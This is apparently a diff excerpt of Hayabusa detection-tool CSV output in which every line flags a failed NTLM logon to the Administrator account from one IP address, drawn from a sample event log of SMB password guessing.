+2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
